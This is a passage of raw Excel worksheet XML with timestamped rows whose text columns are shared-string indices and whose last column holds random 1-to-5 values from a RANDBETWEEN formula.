        <v>80</v>
      </c>
      <c r="E19489" t="s">
        <v>17482</v>
      </c>
      <c r="F19489">
        <f t="shared" ca="1" si="304"/>
        <v>5</v>
      </c>
    </row>
    <row r="19490" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19490" s="1">
        <v>43139.838020833333</v>
      </c>
      <c r="C19490" t="s">
        <v>537</v>
      </c>
      <c r="D19490" t="s">
        <v>494</v>
      </c>
      <c r="E19490" s="2" t="s">
        <v>17483</v>
      </c>
      <c r="F19490">
        <f t="shared" ca="1" si="304"/>
        <v>4</v>
      </c>
    </row>
    <row r="19491" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A19491" s="1">
        <v>43139.832743055558</v>
      </c>
      <c r="C19491" t="s">
        <v>140</v>
      </c>
      <c r="D19491" t="s">
        <v>141</v>
      </c>
      <c r="E19491" s="2" t="s">
        <v>17484</v>
      </c>
      <c r="F19491">
        <f t="shared" ca="1" si="304"/>
        <v>3</v>
      </c>
    </row>
    <row r="19492" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19492" s="1">
        <v>43139.828738425924</v>
      </c>
      <c r="C19492" t="s">
        <v>1510</v>
      </c>
      <c r="D19492" t="s">
        <v>993</v>
      </c>
      <c r="E19492" s="2" t="s">
        <v>17485</v>
      </c>
      <c r="F19492">
        <f t="shared" ca="1" si="304"/>
        <v>1</v>
      </c>
    </row>
    <row r="19493" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19493" s="1">
        <v>43139.796689814815</v>
      </c>
      <c r="C19493" t="s">
        <v>10</v>
      </c>
      <c r="D19493" t="s">
        <v>244</v>
      </c>
      <c r="E19493" t="s">
        <v>17486</v>
      </c>
      <c r="F19493">
        <f t="shared" ca="1" si="304"/>
        <v>1</v>
      </c>
    </row>
    <row r="19494" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19494" s="1">
        <v>43139.774664351855</v>
      </c>
      <c r="C19494" t="s">
        <v>10</v>
      </c>
      <c r="D19494" t="s">
        <v>271</v>
      </c>
      <c r="E19494" t="s">
        <v>17487</v>
      </c>
      <c r="F19494">
        <f t="shared" ca="1" si="304"/>
        <v>3</v>
      </c>
    </row>
    <row r="19495" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19495" s="1">
        <v>43139.77138888889</v>
      </c>
      <c r="C19495" t="s">
        <v>10</v>
      </c>
      <c r="D19495" t="s">
        <v>36</v>
      </c>
      <c r="E19495" t="s">
        <v>17488</v>
      </c>
      <c r="F19495">
        <f t="shared" ca="1" si="304"/>
        <v>2</v>
      </c>
    </row>
    <row r="19496" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19496" s="1">
        <v>43139.771180555559</v>
      </c>
      <c r="C19496" t="s">
        <v>537</v>
      </c>
      <c r="D19496" t="s">
        <v>374</v>
      </c>
      <c r="E19496" s="2" t="s">
        <v>17489</v>
      </c>
      <c r="F19496">
        <f t="shared" ca="1" si="304"/>
        <v>2</v>
      </c>
    </row>
    <row r="19497" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A19497" s="1">
        <v>43139.768703703703</v>
      </c>
      <c r="C19497" t="s">
        <v>10</v>
      </c>
      <c r="D19497" t="s">
        <v>178</v>
      </c>
      <c r="E19497" s="2" t="s">
        <v>17490</v>
      </c>
      <c r="F19497">
        <f t="shared" ca="1" si="304"/>
        <v>2</v>
      </c>
    </row>
    <row r="19498" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19498" s="1">
        <v>43139.752106481479</v>
      </c>
      <c r="C19498" t="s">
        <v>1510</v>
      </c>
      <c r="D19498" t="s">
        <v>36</v>
      </c>
      <c r="E19498" s="2" t="s">
        <v>17491</v>
      </c>
      <c r="F19498">
        <f t="shared" ca="1" si="304"/>
        <v>1</v>
      </c>
    </row>
    <row r="19499" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19499" s="1">
        <v>43139.664687500001</v>
      </c>
      <c r="C19499" t="s">
        <v>10</v>
      </c>
      <c r="D19499" t="s">
        <v>20</v>
      </c>
      <c r="E19499" t="s">
        <v>17492</v>
      </c>
      <c r="F19499">
        <f t="shared" ca="1" si="304"/>
        <v>4</v>
      </c>
    </row>
    <row r="19500" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19500" s="1">
        <v>43139.664178240739</v>
      </c>
      <c r="C19500" t="s">
        <v>6</v>
      </c>
      <c r="D19500" t="s">
        <v>194</v>
      </c>
      <c r="E19500" t="s">
        <v>17493</v>
      </c>
      <c r="F19500">
        <f t="shared" ca="1" si="304"/>
        <v>4</v>
      </c>
    </row>
    <row r="19501" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19501" s="1">
        <v>43139.659895833334</v>
      </c>
      <c r="C19501" t="s">
        <v>10</v>
      </c>
      <c r="D19501" t="s">
        <v>163</v>
      </c>
      <c r="E19501" t="s">
        <v>17494</v>
      </c>
      <c r="F19501">
        <f t="shared" ca="1" si="304"/>
        <v>3</v>
      </c>
    </row>
    <row r="19502" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19502" s="1">
        <v>43139.6562037037</v>
      </c>
      <c r="C19502" t="s">
        <v>1510</v>
      </c>
      <c r="D19502" t="s">
        <v>1160</v>
      </c>
      <c r="E19502" s="2" t="s">
        <v>17495</v>
      </c>
      <c r="F19502">
        <f t="shared" ca="1" si="304"/>
        <v>4</v>
      </c>
    </row>
    <row r="19503" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19503" s="1">
        <v>43139.651875000003</v>
      </c>
      <c r="C19503" t="s">
        <v>537</v>
      </c>
      <c r="D19503" t="s">
        <v>89</v>
      </c>
      <c r="E19503" s="2" t="s">
        <v>17496</v>
      </c>
      <c r="F19503">
        <f t="shared" ca="1" si="304"/>
        <v>3</v>
      </c>
    </row>
    <row r="19504" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A19504" s="1">
        <v>43139.626840277779</v>
      </c>
      <c r="C19504" t="s">
        <v>10</v>
      </c>
      <c r="D19504" t="s">
        <v>178</v>
      </c>
      <c r="E19504" s="2" t="s">
        <v>17497</v>
      </c>
      <c r="F19504">
        <f t="shared" ca="1" si="304"/>
        <v>3</v>
      </c>
    </row>
    <row r="19505" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A19505" s="1">
        <v>43139.619826388887</v>
      </c>
      <c r="C19505" t="s">
        <v>10</v>
      </c>
      <c r="D19505" t="s">
        <v>163</v>
      </c>
      <c r="E19505" s="2" t="s">
        <v>17498</v>
      </c>
      <c r="F19505">
        <f t="shared" ca="1" si="304"/>
        <v>5</v>
      </c>
    </row>
    <row r="19506" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A19506" s="1">
        <v>43139.618587962963</v>
      </c>
      <c r="C19506" t="s">
        <v>10</v>
      </c>
      <c r="D19506" t="s">
        <v>6</v>
      </c>
      <c r="E19506" s="2" t="s">
        <v>17499</v>
      </c>
      <c r="F19506">
        <f t="shared" ca="1" si="304"/>
        <v>2</v>
      </c>
    </row>
    <row r="19507" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19507" s="1">
        <v>43139.618020833332</v>
      </c>
      <c r="C19507" t="s">
        <v>1050</v>
      </c>
      <c r="E19507" t="s">
        <v>17500</v>
      </c>
      <c r="F19507">
        <f t="shared" ca="1" si="304"/>
        <v>3</v>
      </c>
    </row>
    <row r="19508" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19508" s="1">
        <v>43139.615405092591</v>
      </c>
      <c r="C19508" t="s">
        <v>10</v>
      </c>
      <c r="D19508" t="s">
        <v>36</v>
      </c>
      <c r="E19508" t="s">
        <v>17501</v>
      </c>
      <c r="F19508">
        <f t="shared" ca="1" si="304"/>
        <v>1</v>
      </c>
    </row>
    <row r="19509" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19509" s="1">
        <v>43139.58116898148</v>
      </c>
      <c r="C19509" t="s">
        <v>231</v>
      </c>
      <c r="E19509" t="s">
        <v>17502</v>
      </c>
      <c r="F19509">
        <f t="shared" ca="1" si="304"/>
        <v>2</v>
      </c>
    </row>
    <row r="19510" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19510" s="1">
        <v>43139.578113425923</v>
      </c>
      <c r="C19510" t="s">
        <v>10</v>
      </c>
      <c r="D19510" t="s">
        <v>494</v>
      </c>
      <c r="E19510" t="s">
        <v>17503</v>
      </c>
      <c r="F19510">
        <f t="shared" ca="1" si="304"/>
        <v>1</v>
      </c>
    </row>
    <row r="19511" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A19511" s="1">
        <v>43139.571608796294</v>
      </c>
      <c r="C19511" t="s">
        <v>260</v>
      </c>
      <c r="E19511" s="2" t="s">
        <v>17504</v>
      </c>
      <c r="F19511">
        <f t="shared" ca="1" si="304"/>
        <v>4</v>
      </c>
    </row>
    <row r="19512" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19512" s="1">
        <v>43139.565879629627</v>
      </c>
      <c r="C19512" t="s">
        <v>10</v>
      </c>
      <c r="D19512" t="s">
        <v>112</v>
      </c>
      <c r="E19512" t="s">
        <v>17505</v>
      </c>
      <c r="F19512">
        <f t="shared" ca="1" si="304"/>
        <v>1</v>
      </c>
    </row>
    <row r="19513" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19513" s="1">
        <v>43139.565428240741</v>
      </c>
      <c r="C19513" t="s">
        <v>139</v>
      </c>
      <c r="E19513" t="s">
        <v>17506</v>
      </c>
      <c r="F19513">
        <f t="shared" ca="1" si="304"/>
        <v>2</v>
      </c>
    </row>
    <row r="19514" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A19514" s="1">
        <v>43139.540775462963</v>
      </c>
      <c r="C19514" t="s">
        <v>6</v>
      </c>
      <c r="D19514" t="s">
        <v>2139</v>
      </c>
      <c r="E19514" s="2" t="s">
        <v>17507</v>
      </c>
      <c r="F19514">
        <f t="shared" ca="1" si="304"/>
        <v>2</v>
      </c>
    </row>
    <row r="19515" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19515" s="1">
        <v>43139.529467592591</v>
      </c>
      <c r="C19515" t="s">
        <v>537</v>
      </c>
      <c r="D19515" t="s">
        <v>107</v>
      </c>
      <c r="E19515" s="2" t="s">
        <v>17508</v>
      </c>
      <c r="F19515">
        <f t="shared" ca="1" si="304"/>
        <v>2</v>
      </c>
    </row>
    <row r="19516" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19516" s="1">
        <v>43139.527650462966</v>
      </c>
      <c r="C19516" t="s">
        <v>10</v>
      </c>
      <c r="D19516" t="s">
        <v>6</v>
      </c>
      <c r="E19516" t="s">
        <v>17509</v>
      </c>
      <c r="F19516">
        <f t="shared" ca="1" si="304"/>
        <v>2</v>
      </c>
    </row>
    <row r="19517" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A19517" s="1">
        <v>43139.519386574073</v>
      </c>
      <c r="C19517" t="s">
        <v>3443</v>
      </c>
      <c r="D19517" t="s">
        <v>33</v>
      </c>
      <c r="E19517" s="2" t="s">
        <v>17510</v>
      </c>
      <c r="F19517">
        <f t="shared" ca="1" si="304"/>
        <v>4</v>
      </c>
    </row>
    <row r="19518" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A19518" s="1">
        <v>43139.517905092594</v>
      </c>
      <c r="C19518" t="s">
        <v>10</v>
      </c>
      <c r="D19518" t="s">
        <v>6</v>
      </c>
      <c r="E19518" s="2" t="s">
        <v>17511</v>
      </c>
      <c r="F19518">
        <f t="shared" ca="1" si="304"/>
        <v>2</v>
      </c>
    </row>
    <row r="19519" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19519" s="1">
        <v>43139.508321759262</v>
      </c>
      <c r="C19519" t="s">
        <v>43</v>
      </c>
      <c r="E19519" t="s">
        <v>17512</v>
      </c>
      <c r="F19519">
        <f t="shared" ca="1" si="304"/>
        <v>1</v>
      </c>
    </row>
    <row r="19520" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19520" s="1">
        <v>43139.492326388892</v>
      </c>
      <c r="C19520" t="s">
        <v>260</v>
      </c>
      <c r="E19520" t="s">
        <v>17513</v>
      </c>
      <c r="F19520">
        <f t="shared" ca="1" si="304"/>
        <v>1</v>
      </c>
    </row>
    <row r="19521" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A19521" s="1">
        <v>43139.478854166664</v>
      </c>
      <c r="C19521" t="s">
        <v>10</v>
      </c>
      <c r="D19521" t="s">
        <v>14</v>
      </c>
      <c r="E19521" s="2" t="s">
        <v>17514</v>
      </c>
      <c r="F19521">
        <f t="shared" ca="1" si="304"/>
        <v>3</v>
      </c>
    </row>
    <row r="19522" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19522" s="1">
        <v>43139.478171296294</v>
      </c>
      <c r="C19522" t="s">
        <v>127</v>
      </c>
      <c r="D19522" t="s">
        <v>39</v>
      </c>
      <c r="E19522" t="s">
        <v>17515</v>
      </c>
      <c r="F19522">
        <f t="shared" ref="F19522:F19585" ca="1" si="305">RANDBETWEEN(1,5)</f>
        <v>4</v>
      </c>
    </row>
    <row r="19523" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19523" s="1">
        <v>43139.474849537037</v>
      </c>
      <c r="C19523" t="s">
        <v>537</v>
      </c>
      <c r="D19523" t="s">
        <v>721</v>
      </c>
      <c r="E19523" s="2" t="s">
        <v>17516</v>
      </c>
      <c r="F19523">
        <f t="shared" ca="1" si="305"/>
        <v>4</v>
      </c>
    </row>
    <row r="19524" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19524" s="1">
        <v>43139.472314814811</v>
      </c>
      <c r="C19524" t="s">
        <v>10</v>
      </c>
      <c r="D19524" t="s">
        <v>36</v>
      </c>
      <c r="E19524" t="s">
        <v>17517</v>
      </c>
      <c r="F19524">
        <f t="shared" ca="1" si="305"/>
        <v>3</v>
      </c>
    </row>
    <row r="19525" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19525" s="1">
        <v>43139.447025462963</v>
      </c>
      <c r="C19525" t="s">
        <v>10</v>
      </c>
      <c r="D19525" t="s">
        <v>33</v>
      </c>
      <c r="E19525" t="s">
        <v>17518</v>
      </c>
      <c r="F19525">
        <f t="shared" ca="1" si="305"/>
        <v>3</v>
      </c>
    </row>
    <row r="19526" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A19526" s="1">
        <v>43139.445810185185</v>
      </c>
      <c r="C19526" t="s">
        <v>3443</v>
      </c>
      <c r="D19526" t="s">
        <v>39</v>
      </c>
      <c r="E19526" s="2" t="s">
        <v>17519</v>
      </c>
      <c r="F19526">
        <f t="shared" ca="1" si="305"/>
        <v>2</v>
      </c>
    </row>
    <row r="19527" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19527" s="1">
        <v>43139.426469907405</v>
      </c>
      <c r="C19527" t="s">
        <v>10</v>
      </c>
      <c r="D19527" t="s">
        <v>36</v>
      </c>
      <c r="E19527" s="2" t="s">
        <v>17520</v>
      </c>
      <c r="F19527">
        <f t="shared" ca="1" si="305"/>
        <v>1</v>
      </c>
    </row>
    <row r="19528" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19528" s="1">
        <v>43139.420162037037</v>
      </c>
      <c r="C19528" t="s">
        <v>6</v>
      </c>
      <c r="D19528" t="s">
        <v>602</v>
      </c>
      <c r="E19528" t="s">
        <v>17521</v>
      </c>
      <c r="F19528">
        <f t="shared" ca="1" si="305"/>
        <v>4</v>
      </c>
    </row>
    <row r="19529" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A19529" s="1">
        <v>43139.404791666668</v>
      </c>
      <c r="C19529" t="s">
        <v>48</v>
      </c>
      <c r="E19529" s="2" t="s">
        <v>17522</v>
      </c>
      <c r="F19529">
        <f t="shared" ca="1" si="305"/>
        <v>3</v>
      </c>
    </row>
    <row r="19530" spans="1:6" ht="315" x14ac:dyDescent="0.25">
      <c r="A19530" s="1">
        <v>43139.4</v>
      </c>
      <c r="C19530" t="s">
        <v>10</v>
      </c>
      <c r="D19530" t="s">
        <v>20</v>
      </c>
      <c r="E19530" s="2" t="s">
        <v>17523</v>
      </c>
      <c r="F19530">
        <f t="shared" ca="1" si="305"/>
        <v>1</v>
      </c>
    </row>
    <row r="19531" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A19531" s="1">
        <v>43139.396678240744</v>
      </c>
      <c r="C19531" t="s">
        <v>10</v>
      </c>
      <c r="D19531" t="s">
        <v>336</v>
      </c>
      <c r="E19531" s="2" t="s">
        <v>17524</v>
      </c>
      <c r="F19531">
        <f t="shared" ca="1" si="305"/>
        <v>5</v>
      </c>
    </row>
    <row r="19532" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19532" s="1">
        <v>43139.396168981482</v>
      </c>
      <c r="C19532" t="s">
        <v>10</v>
      </c>
      <c r="D19532" t="s">
        <v>20</v>
      </c>
      <c r="F19532">
        <f t="shared" ca="1" si="305"/>
        <v>4</v>
      </c>
    </row>
    <row r="19533" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19533" s="1">
        <v>43139.395185185182</v>
      </c>
      <c r="C19533" t="s">
        <v>17</v>
      </c>
      <c r="E19533" t="s">
        <v>17525</v>
      </c>
      <c r="F19533">
        <f t="shared" ca="1" si="305"/>
        <v>3</v>
      </c>
    </row>
    <row r="19534" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A19534" s="1">
        <v>43139.393495370372</v>
      </c>
      <c r="C19534" t="s">
        <v>65</v>
      </c>
      <c r="E19534" s="2" t="s">
        <v>17526</v>
      </c>
      <c r="F19534">
        <f t="shared" ca="1" si="305"/>
        <v>5</v>
      </c>
    </row>
    <row r="19535" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A19535" s="1">
        <v>43139.379131944443</v>
      </c>
      <c r="C19535" t="s">
        <v>10</v>
      </c>
      <c r="D19535" t="s">
        <v>39</v>
      </c>
      <c r="E19535" s="2" t="s">
        <v>17527</v>
      </c>
      <c r="F19535">
        <f t="shared" ca="1" si="305"/>
        <v>1</v>
      </c>
    </row>
    <row r="19536" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19536" s="1">
        <v>43139.374791666669</v>
      </c>
      <c r="C19536" t="s">
        <v>10</v>
      </c>
      <c r="D19536" t="s">
        <v>20</v>
      </c>
      <c r="E19536" t="s">
        <v>32</v>
      </c>
      <c r="F19536">
        <f t="shared" ca="1" si="305"/>
        <v>5</v>
      </c>
    </row>
    <row r="19537" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A19537" s="1">
        <v>43139.371840277781</v>
      </c>
      <c r="C19537" t="s">
        <v>17</v>
      </c>
      <c r="E19537" s="2" t="s">
        <v>17528</v>
      </c>
      <c r="F19537">
        <f t="shared" ca="1" si="305"/>
        <v>4</v>
      </c>
    </row>
    <row r="19538" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19538" s="1">
        <v>43139.365486111114</v>
      </c>
      <c r="C19538" t="s">
        <v>10</v>
      </c>
      <c r="D19538" t="s">
        <v>20</v>
      </c>
      <c r="E19538" t="s">
        <v>32</v>
      </c>
      <c r="F19538">
        <f t="shared" ca="1" si="305"/>
        <v>2</v>
      </c>
    </row>
    <row r="19539" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19539" s="1">
        <v>43139.365416666667</v>
      </c>
      <c r="C19539" t="s">
        <v>10</v>
      </c>
      <c r="D19539" t="s">
        <v>20</v>
      </c>
      <c r="E19539" t="s">
        <v>32</v>
      </c>
      <c r="F19539">
        <f t="shared" ca="1" si="305"/>
        <v>5</v>
      </c>
    </row>
    <row r="19540" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19540" s="1">
        <v>43139.365347222221</v>
      </c>
      <c r="C19540" t="s">
        <v>10</v>
      </c>
      <c r="D19540" t="s">
        <v>20</v>
      </c>
      <c r="E19540" t="s">
        <v>32</v>
      </c>
      <c r="F19540">
        <f t="shared" ca="1" si="305"/>
        <v>5</v>
      </c>
    </row>
    <row r="19541" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19541" s="1">
        <v>43139.36519675926</v>
      </c>
      <c r="C19541" t="s">
        <v>10</v>
      </c>
      <c r="D19541" t="s">
        <v>20</v>
      </c>
      <c r="E19541" t="s">
        <v>32</v>
      </c>
      <c r="F19541">
        <f t="shared" ca="1" si="305"/>
        <v>3</v>
      </c>
    </row>
    <row r="19542" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19542" s="1">
        <v>43139.309259259258</v>
      </c>
      <c r="C19542" t="s">
        <v>124</v>
      </c>
      <c r="E19542" t="s">
        <v>17529</v>
      </c>
      <c r="F19542">
        <f t="shared" ca="1" si="305"/>
        <v>1</v>
      </c>
    </row>
    <row r="19543" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A19543" s="1">
        <v>43139.306180555555</v>
      </c>
      <c r="C19543" t="s">
        <v>3443</v>
      </c>
      <c r="D19543" t="s">
        <v>33</v>
      </c>
      <c r="E19543" s="2" t="s">
        <v>17530</v>
      </c>
      <c r="F19543">
        <f t="shared" ca="1" si="305"/>
        <v>5</v>
      </c>
    </row>
    <row r="19544" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A19544" s="1">
        <v>43139.262546296297</v>
      </c>
      <c r="C19544" t="s">
        <v>1077</v>
      </c>
      <c r="D19544" t="s">
        <v>17</v>
      </c>
      <c r="E19544" s="2" t="s">
        <v>17531</v>
      </c>
      <c r="F19544">
        <f t="shared" ca="1" si="305"/>
        <v>2</v>
      </c>
    </row>
    <row r="19545" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A19545" s="1">
        <v>43139.226458333331</v>
      </c>
      <c r="C19545" t="s">
        <v>48</v>
      </c>
      <c r="E19545" s="2" t="s">
        <v>17532</v>
      </c>
      <c r="F19545">
        <f t="shared" ca="1" si="305"/>
        <v>5</v>
      </c>
    </row>
    <row r="19546" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19546" s="1">
        <v>43139.215624999997</v>
      </c>
      <c r="C19546" t="s">
        <v>10</v>
      </c>
      <c r="D19546" t="s">
        <v>336</v>
      </c>
      <c r="E19546" s="2" t="s">
        <v>17533</v>
      </c>
      <c r="F19546">
        <f t="shared" ca="1" si="305"/>
        <v>5</v>
      </c>
    </row>
    <row r="19547" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A19547" s="1">
        <v>43139.182164351849</v>
      </c>
      <c r="C19547" t="s">
        <v>3443</v>
      </c>
      <c r="D19547" t="s">
        <v>229</v>
      </c>
      <c r="E19547" s="2" t="s">
        <v>17534</v>
      </c>
      <c r="F19547">
        <f t="shared" ca="1" si="305"/>
        <v>2</v>
      </c>
    </row>
    <row r="19548" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19548" s="1">
        <v>43139.176365740743</v>
      </c>
      <c r="C19548" t="s">
        <v>48</v>
      </c>
      <c r="E19548" t="s">
        <v>17535</v>
      </c>
      <c r="F19548">
        <f t="shared" ca="1" si="305"/>
        <v>5</v>
      </c>
    </row>
    <row r="19549" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A19549" s="1">
        <v>43139.129641203705</v>
      </c>
      <c r="C19549" t="s">
        <v>7419</v>
      </c>
      <c r="D19549" t="s">
        <v>67</v>
      </c>
      <c r="E19549" s="2" t="s">
        <v>17536</v>
      </c>
      <c r="F19549">
        <f t="shared" ca="1" si="305"/>
        <v>2</v>
      </c>
    </row>
    <row r="19550" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A19550" s="1">
        <v>43139.115833333337</v>
      </c>
      <c r="C19550" t="s">
        <v>43</v>
      </c>
      <c r="E19550" s="2" t="s">
        <v>17537</v>
      </c>
      <c r="F19550">
        <f t="shared" ca="1" si="305"/>
        <v>4</v>
      </c>
    </row>
    <row r="19551" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19551" s="1">
        <v>43139.106921296298</v>
      </c>
      <c r="C19551" t="s">
        <v>48</v>
      </c>
      <c r="E19551" t="s">
        <v>17538</v>
      </c>
      <c r="F19551">
        <f t="shared" ca="1" si="305"/>
        <v>1</v>
      </c>
    </row>
    <row r="19552" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A19552" s="1">
        <v>43139.10255787037</v>
      </c>
      <c r="C19552" t="s">
        <v>48</v>
      </c>
      <c r="E19552" s="2" t="s">
        <v>17539</v>
      </c>
      <c r="F19552">
        <f t="shared" ca="1" si="305"/>
        <v>3</v>
      </c>
    </row>
    <row r="19553" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19553" s="1">
        <v>43139.102303240739</v>
      </c>
      <c r="C19553" t="s">
        <v>41</v>
      </c>
      <c r="E19553" t="s">
        <v>17540</v>
      </c>
      <c r="F19553">
        <f t="shared" ca="1" si="305"/>
        <v>4</v>
      </c>
    </row>
    <row r="19554" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A19554" s="1">
        <v>43139.080960648149</v>
      </c>
      <c r="C19554" t="s">
        <v>2172</v>
      </c>
      <c r="D19554" t="s">
        <v>36</v>
      </c>
      <c r="E19554" s="2" t="s">
        <v>17541</v>
      </c>
      <c r="F19554">
        <f t="shared" ca="1" si="305"/>
        <v>2</v>
      </c>
    </row>
    <row r="19555" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A19555" s="1">
        <v>43138.995196759257</v>
      </c>
      <c r="C19555" t="s">
        <v>10</v>
      </c>
      <c r="D19555" t="s">
        <v>89</v>
      </c>
      <c r="E19555" s="2" t="s">
        <v>17542</v>
      </c>
      <c r="F19555">
        <f t="shared" ca="1" si="305"/>
        <v>4</v>
      </c>
    </row>
    <row r="19556" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19556" s="1">
        <v>43138.990879629629</v>
      </c>
      <c r="C19556" t="s">
        <v>41</v>
      </c>
      <c r="E19556" t="s">
        <v>17543</v>
      </c>
      <c r="F19556">
        <f t="shared" ca="1" si="305"/>
        <v>1</v>
      </c>
    </row>
    <row r="19557" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19557" s="1">
        <v>43138.810752314814</v>
      </c>
      <c r="C19557" t="s">
        <v>140</v>
      </c>
      <c r="D19557" t="s">
        <v>141</v>
      </c>
      <c r="E19557" t="s">
        <v>17544</v>
      </c>
      <c r="F19557">
        <f t="shared" ca="1" si="305"/>
        <v>2</v>
      </c>
    </row>
    <row r="19558" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19558" s="1">
        <v>43138.755428240744</v>
      </c>
      <c r="C19558" t="s">
        <v>140</v>
      </c>
      <c r="D19558" t="s">
        <v>141</v>
      </c>
      <c r="E19558" s="2" t="s">
        <v>17545</v>
      </c>
      <c r="F19558">
        <f t="shared" ca="1" si="305"/>
        <v>2</v>
      </c>
    </row>
    <row r="19559" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19559" s="1">
        <v>43138.743541666663</v>
      </c>
      <c r="C19559" t="s">
        <v>10</v>
      </c>
      <c r="D19559" t="s">
        <v>6</v>
      </c>
      <c r="E19559" t="s">
        <v>17546</v>
      </c>
      <c r="F19559">
        <f t="shared" ca="1" si="305"/>
        <v>5</v>
      </c>
    </row>
    <row r="19560" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19560" s="1">
        <v>43138.717905092592</v>
      </c>
      <c r="C19560" t="s">
        <v>48</v>
      </c>
      <c r="E19560" t="s">
        <v>17547</v>
      </c>
      <c r="F19560">
        <f t="shared" ca="1" si="305"/>
        <v>4</v>
      </c>
    </row>
    <row r="19561" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A19561" s="1">
        <v>43138.717650462961</v>
      </c>
      <c r="C19561" t="s">
        <v>43</v>
      </c>
      <c r="E19561" s="2" t="s">
        <v>17548</v>
      </c>
      <c r="F19561">
        <f t="shared" ca="1" si="305"/>
        <v>1</v>
      </c>
    </row>
    <row r="19562" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19562" s="1">
        <v>43138.64162037037</v>
      </c>
      <c r="C19562" t="s">
        <v>10</v>
      </c>
      <c r="D19562" t="s">
        <v>14</v>
      </c>
      <c r="E19562" s="2" t="s">
        <v>17549</v>
      </c>
      <c r="F19562">
        <f t="shared" ca="1" si="305"/>
        <v>1</v>
      </c>
    </row>
    <row r="19563" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A19563" s="1">
        <v>43138.635347222225</v>
      </c>
      <c r="C19563" t="s">
        <v>10</v>
      </c>
      <c r="D19563" t="s">
        <v>14</v>
      </c>
      <c r="E19563" s="2" t="s">
        <v>17550</v>
      </c>
      <c r="F19563">
        <f t="shared" ca="1" si="305"/>
        <v>3</v>
      </c>
    </row>
    <row r="19564" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19564" s="1">
        <v>43138.619050925925</v>
      </c>
      <c r="C19564" t="s">
        <v>10</v>
      </c>
      <c r="D19564" t="s">
        <v>52</v>
      </c>
      <c r="E19564" t="s">
        <v>17551</v>
      </c>
      <c r="F19564">
        <f t="shared" ca="1" si="305"/>
        <v>2</v>
      </c>
    </row>
    <row r="19565" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A19565" s="1">
        <v>43138.593923611108</v>
      </c>
      <c r="C19565" t="s">
        <v>189</v>
      </c>
      <c r="D19565" t="s">
        <v>36</v>
      </c>
      <c r="E19565" s="2" t="s">
        <v>17552</v>
      </c>
      <c r="F19565">
